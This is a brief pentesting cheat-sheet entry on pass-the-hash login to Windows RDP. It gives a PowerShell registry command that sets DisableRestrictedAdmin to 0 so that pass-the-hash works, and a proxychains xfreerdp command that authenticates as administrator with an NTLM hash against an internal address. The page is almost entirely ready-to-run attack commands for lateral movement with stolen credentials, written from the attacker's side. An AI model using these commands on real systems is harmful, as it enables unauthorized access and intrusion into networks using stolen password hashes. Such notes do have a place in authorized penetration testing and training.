RDP login with NTLM Hash
Last updated
Last updated
RDP login using NTLM Hash is absolutely possible. Just keep in mind that the target RDP port must be reachable from our Parrot attacking machine. So if we have a valid NTLM Hash of any user (Mostly Admin), we can use that hash to login through RDP using xfreerdp:
Enable RDP pass the hash on the Target Machine for example purpose:
New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -Force
Then to pass the hash with RDP to Target_Machine:
proxychains xfreerdp /v:172.16.X.194 /u:administrator /pth:f99529e42ee77dc4704c568ba9320a34 +compression +clipboard /dynamic-resolution +toggle-fullscreen /cert-ignore